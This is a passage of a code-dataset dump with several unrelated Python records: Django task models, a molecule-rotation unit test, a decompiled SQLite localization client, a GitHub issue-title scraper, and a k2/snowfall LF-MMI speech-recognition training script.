0\n for p in project.task_set.filter(category=self):\n total += p.price\n return total\n\n def get_project_category_expense(self, project):\n total = 0\n for p in project.task_set.filter(category=self):\n total += p.expense\n return total\n\nreversion.register(TaskCategory, follow=['task_set'], exclude=[\"created, modified\"])\n\n\nclass CategoryBundle(Slugged):\n categories = models.ManyToManyField(TaskCategory, null=True, blank=True, related_name='bundles')\n\n def get_update_url(self):\n return reverse('tasks:bundle-update', kwargs={'pk': self.pk})\n","sub_path":"cpm/tasks/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"94830120","text":"\nimport unittest\nimport numpy as np\n\nfrom use_generator import Generator\nfrom template import Template\nfrom molecules import Water, Atom, Property, Molecule, Rotator\n\nclass WaterTest( unittest.TestCase ):\n\n def setUp(self):\n self.ut_alpha = np.random.random( (6, ) )\n self.ut_beat = np.random.random( (10, ) )\n\n self.g = Generator()\n self.w = self.g.get_mol( center = np.random.uniform( -10, 10, [3] ), mol = \"water\" )\n\n self.t1 = np.random.uniform( 0, np.pi/2 )\n self.t2 = np.random.uniform( 0, np.pi )\n self.t3 = np.random.uniform( 0, np.pi/2 )\n\n\n def test_negative_y_get_euler(self):\n\n w = self.g.get_mol( center = [0,0,0], mol = \"water\" )\n\n t1 = 0\n t2 = 0\n t3 = 0\n\n t1 = np.pi/2\n #t2 = np.pi/2\n #t3 = np.pi/2\n\n #t1, t2, t3 = w.get_euler()\n Rz1 = Rotator.get_Rz( t1 )\n #Ry = Molecule.get_Ry_inv( t2 )\n #Rz2 = 
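TaskCategory.update_descendants above rebuilds a comma-separated ancestor-id path while refusing cycles in the parent chain. The same bookkeeping in isolation, over a plain dict instead of Django models (helper name hypothetical):

def build_ascendants(node_id, parent_of):
    """parent_of maps id -> parent id (or None). Returns 'a,b,c' or None on a cycle."""
    path = [node_id]
    seen = {node_id}
    parent = parent_of.get(node_id)
    while parent is not None:
        if parent in seen:          # parent chain returned to a known node: cycle
            return None
        path.insert(0, parent)      # ancestors come first, as in the model field
        seen.add(parent)
        parent = parent_of.get(parent)
    return ",".join(str(i) for i in path)

assert build_ascendants(3, {3: 2, 2: 1, 1: None}) == "1,2,3"
assert build_ascendants(1, {1: 2, 2: 1}) is None   # cycle detected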
Molecule.get_Rz( t3 )\n\n\n\n #assert isinstance( w, )\n\n\n\n def eq(self, a, b):\n np.testing.assert_almost_equal( a, b, decimal = 3)\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/test/test_operators.py","file_name":"test_operators.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"127724362","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.6-i386/egg/silme/io/sqlite.py\n# Compiled at: 2010-06-12 17:55:55\nimport silme.io\nfrom silme.io.clients import IOClient, DBClient\nfrom silme.core import L10nPackage, L10nObject, EntityList, Object, Entity\nimport os\nfrom pysqlite2 import dbapi2 as sqlite\n\ndef register(Manager):\n Manager.register(SQLiteClient)\n\n\nclass SQLiteClient(DBClient):\n name = 'sqlite'\n desc = 'SQLite reader/writer'\n type = IOClient.__name__\n\n @classmethod\n def matches_path(cls, path):\n \"\"\"\n tests if the ioclient should be used for this type of path\n Matches any sqlite:\n \"\"\"\n return path.startswith('sqlite:')\n\n @classmethod\n def get_entitylist(cls, path, source=False, code='default', parser=None):\n entityList = EntityList()\n (path, table) = cls._explode_path(path)\n con = cls._connected()\n if not con:\n cls._connect(path)\n cursor = cls.connection.cursor()\n cursor.execute('SELECT * FROM ' + table)\n for row in cursor:\n entitylist.add_entity(Entity(row[0], row[1]))\n\n cursor.close()\n if not con:\n cls._close()\n return entitylist\n\n @classmethod\n def get_l10npackage(cls, path, load_objects=True):\n l10npackage = L10nPackage()\n cls._connect(path)\n l10npackage.id = os.path.basename(path)\n l10npackage.objects['L10nTable'] = L10nObject(cls.build_entitylist(path, 'L10nTable'))\n cls._close()\n return l10npackage\n\n @classmethod\n def _explode_path(cls, path):\n return (\n path, 'l10n')\n\n @classmethod\n def _connect(cls, path):\n cls.connection = sqlite.connect(path)\n\n def _close(cls):\n if cls._connected():\n cls.connection.close()\n cls.connection = None\n return\n\n def _connected():\n return bool(cls.connection)","sub_path":"pycfiles/silme-0.8.1-py2.5/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"451389628","text":"import urllib.request\nfrom bs4 import BeautifulSoup\n\nlist_sites = []\nnum = 58\n\nfor i in range(1, num):\n url = 'https://github.com/reek/anti-adblock-killer/issues?page=' + str(i) + '&q=is%3Aissue+is%3Aopen'\n with urllib.request.urlopen(url) as response:\n html = response.read()\n soup = BeautifulSoup(html, 'html.parser')\n #pretty_html = soup.prettify()\n #with open(str(i) + '.hmtl', 'w') as f:\n # f.write(pretty_html)\n all_links = soup.find_all(\"a\", class_=\"link-gray-dark no-underline h4 js-navigation-open\")\n for link in all_links:\n site = link.string.rstrip().lstrip()\n if site:\n #print(site)\n list_sites.append(site)\nprint(len(list_sites))\n\nwith open('reek.txt', 'w') as f:\n for site in list_sites:\n f.write(site + '\\n')\n","sub_path":"Code/reek_issues.py","file_name":"reek_issues.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"265085652","text":"#!/usr/bin/env python3\n\n# Copyright (c) 2020 Xiaomi 
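SQLiteClient.get_entitylist above binds entityList but then calls entitylist.add_entity and returns entitylist, a NameError at runtime since Python identifiers are case-sensitive; _close and _connected also reference cls without being classmethods. A minimal corrected fetch using the stdlib sqlite3 module (pysqlite2 is the legacy package name for the same driver):

import sqlite3

def fetch_entities(path, table="l10n"):
    """Return (key, value) rows from one table; the table name must be trusted input."""
    con = sqlite3.connect(path)
    try:
        return [(row[0], row[1]) for row in con.execute(f"SELECT * FROM {table}")]
    finally:
        con.close()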
Corporation (authors: Daniel Povey\n# Haowen Qiu\n# Fangjun Kuang)\n# 2021 University of Chinese Academy of Sciences (author: Han Zhu)\n# Apache 2.0\n\nimport argparse\nimport logging\nimport os\nimport sys\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import Dict, Optional\n\nimport k2\nimport numpy as np\nimport torch\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\nfrom torch import nn\nfrom torch.cuda.amp import GradScaler, autocast\nfrom torch.nn.parallel import DistributedDataParallel as DDP\nfrom torch.nn.utils import clip_grad_value_\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom lhotse.utils import fix_random_seed, nullcontext\nfrom snowfall.common import describe, str2bool\nfrom snowfall.common import load_checkpoint, save_checkpoint\nfrom snowfall.common import save_training_info\nfrom snowfall.common import setup_logger\nfrom snowfall.data.librispeech import LibriSpeechAsrDataModule\nfrom snowfall.dist import cleanup_dist\nfrom snowfall.dist import setup_dist\nfrom snowfall.lexicon import Lexicon\nfrom snowfall.models import AcousticModel\nfrom snowfall.models.conformer import Conformer\nfrom snowfall.models.contextnet import ContextNet\nfrom snowfall.models.tdnn_lstm import TdnnLstm1b # alignment model\nfrom snowfall.models.transformer import Noam, Transformer\nfrom snowfall.objectives import LFMMILoss, encode_supervisions\nfrom snowfall.training.diagnostics import measure_gradient_norms, optim_step_and_measure_param_change\nfrom snowfall.training.mmi_graph import MmiTrainingGraphCompiler\nfrom snowfall.training.mmi_graph import create_bigram_phone_lm\n\n\ndef get_objf(batch: Dict,\n model: AcousticModel,\n ali_model: Optional[AcousticModel],\n P: k2.Fsa,\n device: torch.device,\n graph_compiler: MmiTrainingGraphCompiler,\n use_pruned_intersect: bool,\n is_training: bool,\n is_update: bool,\n accum_grad: int = 1,\n den_scale: float = 1.0,\n att_rate: float = 0.0,\n tb_writer: Optional[SummaryWriter] = None,\n global_batch_idx_train: Optional[int] = None,\n optimizer: Optional[torch.optim.Optimizer] = None,\n scaler: GradScaler = None\n ):\n feature = batch['inputs']\n # at entry, feature is [N, T, C]\n feature = feature.permute(0, 2, 1) # now feature is [N, C, T]\n assert feature.ndim == 3\n feature = feature.to(device)\n\n supervisions = batch['supervisions']\n supervision_segments, texts = encode_supervisions(supervisions)\n\n loss_fn = LFMMILoss(\n graph_compiler=graph_compiler,\n P=P,\n den_scale=den_scale,\n use_pruned_intersect=use_pruned_intersect\n )\n\n grad_context = nullcontext if is_training else torch.no_grad\n\n with autocast(enabled=scaler.is_enabled()), grad_context():\n\n if att_rate == 0:\n # Note: Make TorchScript happy by making the supervision dict strictly\n # conform to type Dict[str, Tensor]\n # Using the attention decoder with TorchScript is currently unsupported,\n # we'll need to separate out the 'text' field from 'supervisions' first.\n del supervisions['text']\n\n nnet_output, encoder_memory, memory_mask = model(feature, supervisions)\n if att_rate != 0.0:\n att_loss = model.module.decoder_forward(encoder_memory, memory_mask, supervisions, graph_compiler)\n\n if (ali_model is not None and global_batch_idx_train is not None and\n global_batch_idx_train // accum_grad < 4000):\n with torch.no_grad():\n ali_model_output = ali_model(feature)\n # subsampling is done slightly differently, may be small length\n # differences.\n min_len = 
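In get_objf above, the frozen alignment model's output is added to the network output with a weight of 500 / (step + 500), and only for the first 4000 optimizer steps (step being global_batch_idx_train // accum_grad), so the pretrained model dominates early and fades out. The schedule in isolation:

def ali_scale(optimizer_step: int) -> float:
    """Weight applied to the frozen alignment model's log-probs."""
    if optimizer_step >= 4000:          # blending is switched off entirely
        return 0.0
    return 500.0 / (optimizer_step + 500)

assert ali_scale(0) == 1.0
assert abs(ali_scale(500) - 0.5) < 1e-12
assert ali_scale(4000) == 0.0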
min(ali_model_output.shape[2], nnet_output.shape[2])\n # scale less than one so it will be encouraged\n # to mimic ali_model's output\n ali_model_scale = 500.0 / (global_batch_idx_train // accum_grad + 500)\n nnet_output = nnet_output.clone() # or log-softmax backprop will fail.\n nnet_output[:, :,:min_len] += ali_model_scale * ali_model_output[:, :,:min_len]\n\n # nnet_output is [N, C, T]\n nnet_output = nnet_output.permute(0, 2, 1) # now nnet_output is [N, T, C]\n\n mmi_loss, tot_frames, all_frames = loss_fn(nnet_output, texts, supervision_segments)\n\n if is_training:\n def maybe_log_gradients(tag: str):\n if tb_writer is not None and global_batch_idx_train is not None and global_batch_idx_train % 200 == 0:\n tb_writer.add_scalars(\n tag,\n measure_gradient_norms(model, norm='l1'),\n global_step=global_batch_idx_train\n )\n\n if att_rate != 0.0:\n loss = (- (1.0 - att_rate) * mmi_loss + att_rate * att_loss) / (len(texts) * accum_grad)\n else:\n loss = (-mmi_loss) / (len(texts) * accum_grad)\n scaler.scale(loss).backward()\n if is_update:\n maybe_log_gradients('train/grad_norms')\n scaler.unscale_(optimizer)\n clip_grad_value_(model.parameters(), 5.0)\n maybe_log_gradients('train/clipped_grad_norms')\n if tb_writer is not None and (global_batch_idx_train // accum_grad) % 200 == 0:\n # Once in a time we will perform a more costly diagnostic\n # to check the relative parameter change per minibatch.\n deltas = optim_step_and_measure_param_change(model, optimizer, scaler)\n tb_writer.add_scalars(\n 'train/relative_param_change_per_minibatch',\n deltas,\n global_step=global_batch_idx_train\n )\n else:\n scaler.step(optimizer)\n optimizer.zero_grad()\n scaler.update()\n\n ans = -mmi_loss.detach().cpu().item(), tot_frames.cpu().item(\n ), all_frames.cpu().item()\n return ans\n\n\ndef get_validation_objf(dataloader: torch.utils.data.DataLoader,\n model: AcousticModel,\n ali_model: Optional[AcousticModel],\n P: k2.Fsa,\n device: torch.device,\n graph_compiler: MmiTrainingGraphCompiler,\n use_pruned_intersect: bool,\n scaler: GradScaler,\n den_scale: float = 1,\n ):\n total_objf = 0.\n total_frames = 0. # for display only\n total_all_frames = 0. 
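The training branch above follows the usual AMP plus gradient-accumulation pattern: scale and backpropagate every micro-batch, but unscale, clip, and step only once per accum_grad micro-batches. A condensed, CPU-runnable sketch (the scaler is disabled so it runs without a GPU; the real loss is additionally normalized by the number of utterances):

import torch
from torch.cuda.amp import GradScaler

model = torch.nn.Linear(4, 2)
optimizer = torch.optim.SGD(model.parameters(), lr=0.1)
scaler = GradScaler(enabled=False)       # enabled=True requires a CUDA device
accum_grad = 4

for step in range(8):
    x = torch.randn(3, 4)
    loss = model(x).sum() / accum_grad   # normalize by the accumulation factor
    scaler.scale(loss).backward()        # gradients accumulate across micro-batches
    if (step + 1) % accum_grad == 0:
        scaler.unscale_(optimizer)       # so clipping sees true gradient values
        torch.nn.utils.clip_grad_value_(model.parameters(), 5.0)
        scaler.step(optimizer)
        optimizer.zero_grad()
        scaler.update()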
# all frames including those seqs that failed.\n\n model.eval()\n\n from torchaudio.datasets.utils import bg_iterator\n for batch_idx, batch in enumerate(bg_iterator(dataloader, 2)):\n objf, frames, all_frames = get_objf(\n batch=batch,\n model=model,\n ali_model=ali_model,\n P=P,\n device=device,\n graph_compiler=graph_compiler,\n use_pruned_intersect=use_pruned_intersect,\n is_training=False,\n is_update=False,\n den_scale=den_scale,\n scaler=scaler\n )\n total_objf += objf\n total_frames += frames\n total_all_frames += all_frames\n\n return total_objf, total_frames, total_all_frames\n\n\ndef train_one_epoch(dataloader: torch.utils.data.DataLoader,\n valid_dataloader: torch.utils.data.DataLoader,\n model: AcousticModel,\n ali_model: Optional[AcousticModel],\n P: k2.Fsa,\n device: torch.device,\n graph_compiler: MmiTrainingGraphCompiler,\n use_pruned_intersect: bool,\n optimizer: torch.optim.Optimizer,\n accum_grad: int,\n den_scale: float,\n att_rate: float,\n current_epoch: int,\n tb_writer: SummaryWriter,\n num_epochs: int,\n global_batch_idx_train: int,\n world_size: int,\n scaler: GradScaler\n ):\n \"\"\"One epoch training and validation.\n\n Args:\n dataloader: Training dataloader\n valid_dataloader: Validation dataloader\n model: Acoustic model to be trained\n P: An FSA representing the bigram phone LM\n device: Training device, torch.device(\"cpu\") or torch.device(\"cuda\", device_id)\n graph_compiler: MMI training graph compiler\n optimizer: Training optimizer\n accum_grad: Number of gradient accumulation\n den_scale: Denominator scale in mmi loss\n att_rate: Attention loss rate, final loss is att_rate * att_loss + (1-att_rate) * other_loss\n current_epoch: current training epoch, for logging only\n tb_writer: tensorboard SummaryWriter\n num_epochs: total number of training epochs, for logging only\n global_batch_idx_train: global training batch index before this epoch, for logging only\n\n Returns:\n A tuple of 3 scalar: (total_objf / total_frames, valid_average_objf, global_batch_idx_train)\n - `total_objf / total_frames` is the average training loss\n - `valid_average_objf` is the average validation loss\n - `global_batch_idx_train` is the global training batch index after this epoch\n \"\"\"\n total_objf, total_frames, total_all_frames = 0., 0., 0.\n valid_average_objf = float('inf')\n time_waiting_for_batch = 0\n forward_count = 0\n prev_timestamp = datetime.now()\n\n model.train()\n for batch_idx, batch in enumerate(dataloader):\n forward_count += 1\n if forward_count == accum_grad:\n is_update = True\n forward_count = 0\n else:\n is_update = False\n\n global_batch_idx_train += 1\n timestamp = datetime.now()\n time_waiting_for_batch += (timestamp - prev_timestamp).total_seconds()\n\n if forward_count == 1 or accum_grad == 1:\n P.set_scores_stochastic_(model.module.P_scores)\n assert P.requires_grad is True\n\n curr_batch_objf, curr_batch_frames, curr_batch_all_frames = get_objf(\n batch=batch,\n model=model,\n ali_model=ali_model,\n P=P,\n device=device,\n graph_compiler=graph_compiler,\n use_pruned_intersect=use_pruned_intersect,\n is_training=True,\n is_update=is_update,\n accum_grad=accum_grad,\n den_scale=den_scale,\n att_rate=att_rate,\n tb_writer=tb_writer,\n global_batch_idx_train=global_batch_idx_train,\n optimizer=optimizer,\n scaler=scaler\n )\n\n total_objf += curr_batch_objf\n total_frames += curr_batch_frames\n total_all_frames += curr_batch_all_frames\n\n if batch_idx % 10 == 0:\n logging.info(\n 'batch {}, epoch {}/{} '\n 'global average objf: {:.6f} over {} 
'\n 'frames ({:.1f}% kept), current batch average objf: {:.6f} over {} frames ({:.1f}% kept) '\n 'avg time waiting for batch {:.3f}s'.format(\n batch_idx, current_epoch, num_epochs,\n total_objf / total_frames, total_frames,\n 100.0 * total_frames / total_all_frames,\n curr_batch_objf / (curr_batch_frames + 0.001),\n curr_batch_frames,\n 100.0 * curr_batch_frames / curr_batch_all_frames,\n time_waiting_for_batch / max(1, batch_idx)))\n\n if tb_writer is not None:\n tb_writer.add_scalar('train/global_average_objf',\n total_objf / total_frames, global_batch_idx_train)\n\n tb_writer.add_scalar('train/current_batch_average_objf',\n curr_batch_objf / (curr_batch_frames + 0.001),\n global_batch_idx_train)\n # if batch_idx >= 10:\n # print(\"Exiting early to get profile info\")\n # sys.exit(0)\n\n if batch_idx > 0 and batch_idx % 200 == 0:\n total_valid_objf, total_valid_frames, total_valid_all_frames = get_validation_objf(\n dataloader=valid_dataloader,\n model=model,\n ali_model=ali_model,\n P=P,\n device=device,\n graph_compiler=graph_compiler,\n use_pruned_intersect=use_pruned_intersect,\n scaler=scaler)\n if world_size > 1:\n s = torch.tensor([\n total_valid_objf, total_valid_frames,\n total_valid_all_frames\n ]).to(device)\n\n dist.all_reduce(s, op=dist.ReduceOp.SUM)\n total_valid_objf, total_valid_frames, total_valid_all_frames = s.cpu().tolist()\n\n valid_average_objf = total_valid_objf / total_valid_frames\n model.train()\n logging.info(\n 'Validation average objf: {:.6f} over {} frames ({:.1f}% kept)'\n .format(valid_average_objf,\n total_valid_frames,\n 100.0 * total_valid_frames / total_valid_all_frames))\n\n if tb_writer is not None:\n tb_writer.add_scalar('train/global_valid_average_objf',\n valid_average_objf,\n global_batch_idx_train)\n model.module.write_tensorboard_diagnostics(tb_writer, global_step=global_batch_idx_train)\n prev_timestamp = datetime.now()\n return total_objf / total_frames, valid_average_objf, global_batch_idx_train\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\n '--world-size',\n type=int,\n default=1,\n help='Number of GPUs for DDP training.')\n parser.add_argument(\n '--master-port',\n type=int,\n default=12354,\n help='Master port to use for DDP training.')\n parser.add_argument(\n '--model-type',\n type=str,\n default=\"conformer\",\n choices=[\"transformer\", \"conformer\", \"contextnet\"],\n help=\"Model type.\")\n parser.add_argument(\n '--num-epochs',\n type=int,\n default=10,\n help=\"Number of training epochs.\")\n parser.add_argument(\n '--start-epoch',\n type=int,\n default=0,\n help=\"Number of start epoch.\")\n parser.add_argument(\n '--warm-step',\n type=int,\n default=5000,\n help='The number of warm-up steps for Noam optimizer.'\n )\n parser.add_argument(\n '--lr-factor',\n type=float,\n default=1.0,\n help='Learning rate factor for Noam optimizer.'\n )\n parser.add_argument(\n '--weight-decay',\n type=float,\n default=0.0,\n help='weight decay (L2 penalty) for Noam optimizer.'\n )\n parser.add_argument(\n '--accum-grad',\n type=int,\n default=1,\n help=\"Number of gradient accumulation.\")\n parser.add_argument(\n '--den-scale',\n type=float,\n default=1.0,\n help=\"denominator scale in mmi loss.\")\n parser.add_argument(\n '--att-rate',\n type=float,\n default=0.0,\n help=\"Attention loss rate.\")\n parser.add_argument(\n '--nhead',\n type=int,\n default=4,\n help=\"Number of attention heads in transformer.\")\n parser.add_argument(\n 
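The --warm-step and --lr-factor flags above parameterize the Noam optimizer; assuming snowfall's Noam follows the schedule from "Attention Is All You Need", the learning rate rises roughly linearly for warm_step steps and then decays as step^-0.5:

def noam_lr(step: int, model_size: int = 256, factor: float = 1.0,
            warm_step: int = 5000) -> float:
    """Noam schedule; step counts from 1 (step 0 would divide by zero)."""
    return factor * model_size ** -0.5 * min(step ** -0.5,
                                             step * warm_step ** -1.5)

peak = noam_lr(5000)               # the schedule peaks at step == warm_step
assert noam_lr(2500) < peak > noam_lr(20000)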
'--attention-dim',\n type=int,\n default=256,\n help=\"Number of units in transformer attention layers.\")\n parser.add_argument(\n '--tensorboard',\n type=str2bool,\n default=True,\n help='Should various information be logged in tensorboard.'\n )\n parser.add_argument(\n '--amp',\n type=str2bool,\n default=True,\n help='Should we use automatic mixed precision (AMP) training.'\n )\n parser.add_argument(\n '--use-ali-model',\n type=str2bool,\n default=True,\n help='If true, we assume that you have run ./ctc_train.py '\n 'and you have some checkpoints inside the directory '\n 'exp-lstm-adam-ctc-musan/ .'\n 'It will use exp-lstm-adam-ctc-musan/epoch-{ali-model-epoch}.pt '\n 'as the pre-trained alignment model'\n )\n parser.add_argument(\n '--ali-model-epoch',\n type=int,\n default=7,\n help='If --use-ali-model is True, load '\n 'exp-lstm-adam-ctc-musan/epoch-{ali-model-epoch}.pt as the alignment model.'\n 'Used only if --use-ali-model is True.'\n )\n parser.add_argument(\n '--use-pruned-intersect',\n type=str2bool,\n default=False,\n help='True to use pruned intersect to compute the denominator lattice. ' \\\n 'You probably want to set it to True if you have a very large LM. ' \\\n 'In that case, you will get an OOM if it is False. ')\n # See https://github.com/k2-fsa/k2/issues/739 for more details\n parser.add_argument(\n '--torchscript',\n type=str2bool,\n default=False,\n help='Should we convert the model to TorchScript before starting training.'\n )\n parser.add_argument(\n '--torchscript-epoch',\n type=int,\n default=-1,\n help='After which epoch should we start storing models with TorchScript,'\n 'so that they can be simply loaded with torch.jit.load(). '\n '-1 disables this option.'\n )\n return parser\n\n\ndef run(rank, world_size, args):\n '''\n Args:\n rank:\n It is a value between 0 and `world_size-1`, which is\n passed automatically by `mp.spawn()` in :func:`main`.\n The node with rank 0 is responsible for saving checkpoint.\n world_size:\n Number of GPUs for DDP training.\n args:\n The return value of get_parser().parse_args()\n '''\n model_type = args.model_type\n start_epoch = args.start_epoch\n num_epochs = args.num_epochs\n accum_grad = args.accum_grad\n den_scale = args.den_scale\n att_rate = args.att_rate\n use_pruned_intersect = args.use_pruned_intersect\n\n fix_random_seed(42)\n setup_dist(rank, world_size, args.master_port)\n\n exp_dir = Path('exp-' + model_type + '-mmi-att-sa-vgg-normlayer')\n setup_logger(f'{exp_dir}/log/log-train-{rank}')\n if args.tensorboard and rank == 0:\n tb_writer = SummaryWriter(log_dir=f'{exp_dir}/tensorboard')\n else:\n tb_writer = None\n # tb_writer = SummaryWriter(log_dir=f'{exp_dir}/tensorboard') if args.tensorboard and rank == 0 else None\n\n logging.info(\"Loading lexicon and symbol tables\")\n lang_dir = Path('data/lang_nosp')\n lexicon = Lexicon(lang_dir)\n\n device_id = rank\n device = torch.device('cuda', device_id)\n\n graph_compiler = MmiTrainingGraphCompiler(\n lexicon=lexicon,\n device=device,\n )\n phone_ids = lexicon.phone_symbols()\n P = create_bigram_phone_lm(phone_ids)\n P.scores = torch.zeros_like(P.scores)\n P = P.to(device)\n\n librispeech = LibriSpeechAsrDataModule(args)\n train_dl = librispeech.train_dataloaders()\n valid_dl = librispeech.valid_dataloaders()\n\n if not torch.cuda.is_available():\n logging.error('No GPU detected!')\n sys.exit(-1)\n\n if use_pruned_intersect:\n logging.info('Use pruned intersect for den_lats')\n else:\n logging.info(\"Don't use pruned intersect for den_lats\")\n\n logging.info(\"About to 
create model\")\n\n if att_rate != 0.0:\n num_decoder_layers = 6\n else:\n num_decoder_layers = 0\n\n if model_type == \"transformer\":\n model = Transformer(\n num_features=80,\n nhead=args.nhead,\n d_model=args.attention_dim,\n num_classes=len(phone_ids) + 1, # +1 for the blank symbol\n subsampling_factor=4,\n num_decoder_layers=num_decoder_layers,\n vgg_frontend=True)\n elif model_type == \"conformer\":\n model = Conformer(\n num_features=80,\n nhead=args.nhead,\n d_model=args.attention_dim,\n num_classes=len(phone_ids) + 1, # +1 for the blank symbol\n subsampling_factor=4,\n num_decoder_layers=num_decoder_layers,\n vgg_frontend=True,\n is_espnet_structure=True)\n elif model_type == \"contextnet\":\n model = ContextNet(\n num_features=80,\n num_classes=len(phone_ids) + 1) # +1 for the blank symbol\n else:\n raise NotImplementedError(\"Model of type \" + str(model_type) + \" is not implemented\")\n\n model.P_scores = nn.Parameter(P.scores.clone(), requires_grad=True)\n\n if args.torchscript:\n logging.info('Applying TorchScript to model...')\n model = torch.jit.script(model)\n\n model.to(device)\n describe(model)\n\n model = DDP(model, device_ids=[rank])\n\n # Now for the alignment model, if any\n if args.use_ali_model:\n ali_model = TdnnLstm1b(\n num_features=80,\n num_classes=len(phone_ids) + 1, # +1 for the blank symbol\n subsampling_factor=4)\n\n ali_model_fname = Path(f'exp-lstm-adam-ctc-musan/epoch-{args.ali_model_epoch}.pt')\n assert ali_model_fname.is_file(), \\\n f'ali model filename {ali_model_fname} does not exist!'\n ali_model.load_state_dict(torch.load(ali_model_fname, map_location='cpu')['state_dict'])\n ali_model.to(device)\n\n ali_model.eval()\n ali_model.requires_grad_(False)\n logging.info(f'Use ali_model: {ali_model_fname}')\n else:\n ali_model = None\n logging.info('No ali_model')\n\n optimizer = Noam(model.parameters(),\n model_size=args.attention_dim,\n factor=args.lr_factor,\n warm_step=args.warm_step,\n weight_decay=args.weight_decay)\n\n scaler = GradScaler(enabled=args.amp)\n\n best_objf = np.inf\n best_valid_objf = np.inf\n best_epoch = start_epoch\n best_model_path = os.path.join(exp_dir, 'best_model.pt')\n best_epoch_info_filename = os.path.join(exp_dir, 'best-epoch-info')\n global_batch_idx_train = 0 # for logging only\n\n if start_epoch > 0:\n model_path = os.path.join(exp_dir, 'epoch-{}.pt'.format(start_epoch - 1))\n ckpt = load_checkpoint(filename=model_path, model=model, optimizer=optimizer, scaler=scaler)\n best_objf = ckpt['objf']\n best_valid_objf = ckpt['valid_objf']\n global_batch_idx_train = ckpt['global_batch_idx_train']\n logging.info(f\"epoch = {ckpt['epoch']}, objf = {best_objf}, valid_objf = {best_valid_objf}\")\n\n for epoch in range(start_epoch, num_epochs):\n train_dl.sampler.set_epoch(epoch)\n curr_learning_rate = optimizer._rate\n if tb_writer is not None:\n tb_writer.add_scalar('train/learning_rate', curr_learning_rate, global_batch_idx_train)\n tb_writer.add_scalar('train/epoch', epoch, global_batch_idx_train)\n\n logging.info('epoch {}, learning rate {}'.format(epoch, curr_learning_rate))\n objf, valid_objf, global_batch_idx_train = train_one_epoch(\n dataloader=train_dl,\n valid_dataloader=valid_dl,\n model=model,\n ali_model=ali_model,\n P=P,\n device=device,\n graph_compiler=graph_compiler,\n use_pruned_intersect=use_pruned_intersect,\n optimizer=optimizer,\n accum_grad=accum_grad,\n den_scale=den_scale,\n att_rate=att_rate,\n current_epoch=epoch,\n tb_writer=tb_writer,\n num_epochs=num_epochs,\n 
global_batch_idx_train=global_batch_idx_train,\n world_size=world_size,\n scaler=scaler\n )\n # the lower, the better\n if valid_objf < best_valid_objf:\n best_valid_objf = valid_objf\n best_objf = objf\n best_epoch = epoch\n save_checkpoint(filename=best_model_path,\n optimizer=None,\n scheduler=None,\n scaler=None,\n model=model,\n epoch=epoch,\n learning_rate=curr_learning_rate,\n objf=objf,\n valid_objf=valid_objf,\n global_batch_idx_train=global_batch_idx_train,\n local_rank=rank,\n torchscript=args.torchscript_epoch != -1 and epoch >= args.torchscript_epoch\n )\n save_training_info(filename=best_epoch_info_filename,\n model_path=best_model_path,\n current_epoch=epoch,\n learning_rate=curr_learning_rate,\n objf=objf,\n best_objf=best_objf,\n valid_objf=valid_objf,\n best_valid_objf=best_valid_objf,\n best_epoch=best_epoch,\n local_rank=rank)\n\n # we always save the model for every epoch\n model_path = os.path.join(exp_dir, 'epoch-{}.pt'.format(epoch))\n save_checkpoint(filename=model_path,\n optimizer=optimizer,\n scheduler=None,\n scaler=scaler,\n model=model,\n epoch=epoch,\n learning_rate=curr_learning_rate,\n objf=objf,\n valid_objf=valid_objf,\n global_batch_idx_train=global_batch_idx_train,\n local_rank=rank,\n torchscript=args.torchscript_epoch != -1 and epoch >= args.torchscript_epoch\n )\n epoch_info_filename = os.path.join(exp_dir, 'epoch-{}-info'.format(epoch))\n save_training_info(filename=epoch_info_filename,\n model_path=model_path,\n current_epoch=epoch,\n learning_rate=curr_learning_rate,\n objf=objf,\n best_objf=best_objf,\n valid_objf=valid_objf,\n best_valid_objf=best_valid_objf,\n best_epoch=best_epoch,\n local_rank=rank)\n\n logging.warning('Done')\n torch.distributed.barrier()\n cleanup_dist()\n\n\ndef main():\n parser = get_parser()\n LibriSpeechAsrDataModule.add_arguments(parser)\n args = parser.parse_args()\n world_size = args.world_size\n assert world_size >= 1\n mp.spawn(run, args=(world_size, args), nprocs=world_size, join=True)\n\n\ntorch.set_num_threads(1)\ntorch.set_num_interop_threads(1)\n\nif __name__ == '__main__':\n main()\n","sub_path":"egs/librispeech/asr/simple_v1/mmi_att_transformer_train.py","file_name":"mmi_att_transformer_train.py","file_ext":"py","file_size_in_byte":27443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"116037806","text":"import json\nimport torch\nimport torch.utils.data as data\nimport unicodedata\nimport string\nimport re\nimport random\nimport time\nimport math\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch import optim\nimport torch.nn.functional as F\nfrom utils.config import *\nimport logging \nimport datetime\n\nclass Lang:\n def __init__(self):\n self.word2index = {}\n self.word2count = {}\n self.index2word = {UNK_token: 'UNK', PAD_token: \"PAD\", EOS_token: \"EOS\", SOS_token: \"SOS\"}\n self.n_words = 4 # Count default tokens\n \n def index_words(self, sentence):\n for word in sentence.split(' '):\n self.index_word(word)\n\n def index_word(self, word):\n if word not in self.word2index:\n self.word2index[word] = self.n_words\n self.word2count[word] = 1\n self.index2word[self.n_words] = word\n self.n_words += 1\n else:\n self.word2count[word] += 1\n\n\nclass Dataset(data.Dataset):\n \"\"\"Custom data.Dataset compatible with data.DataLoader.\"\"\"\n def __init__(self, src_seq, 